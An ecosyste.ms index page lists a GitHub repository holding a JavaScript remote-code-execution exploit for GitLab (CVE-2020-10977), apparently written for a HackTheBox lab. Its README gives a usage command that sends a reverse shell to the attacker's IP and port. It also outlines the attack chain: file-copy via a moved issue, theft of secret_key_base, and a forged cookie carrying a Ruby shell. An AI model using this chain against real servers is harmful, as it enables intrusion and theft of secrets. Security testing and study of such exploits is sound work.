Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/liath/CVE-2020-10977

Gitlab v12.4.0-8.1 RCE
https://github.com/liath/CVE-2020-10977

Last synced: 3 months ago
JSON representation

Gitlab v12.4.0-8.1 RCE

Host: GitHub
URL: https://github.com/liath/CVE-2020-10977
Owner: liath
Created: 2021-03-07T07:26:38.000Z (over 3 years ago)
Default Branch: main
Last Pushed: 2021-03-07T07:28:59.000Z (over 3 years ago)
Last Synced: 2024-05-20T12:35:05.656Z (6 months ago)
Language: JavaScript
Size: 33.2 KB
Stars: 2
Watchers: 2
Forks: 1
Open Issues: 1
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - liath/CVE-2020-10977 - Gitlab v12.4.0-8.1 RCE (JavaScript)

README

### GitLab v12.4.0-12.8.1 RCE
Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me and the HTML parsing stuff seemed cumbersome so I rewrote it in js.

#### Usage
Start a reverse shell handler in the usual way, then run this script with:
```shell
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
node gitlab_rce.js
```

A proxy may be specified with `TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"`.
Burp is particularly useful for debugging with this.

#### What this does
1. checks if target is up
2. if the provided user exists, skip to 5
3. scan for a username that doesn't already exist
4. create that user
5. attempt sign in
6. create two empty projects
7. create an new issue ticket with a malicious link in it's body in the first project
8. move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads dir
9. fetches the target file, in this case we want the secrets.yml for the secret_key_base
10. use secret_key_base to mint an evil cookie with our Ruby shell and pass it to GitLab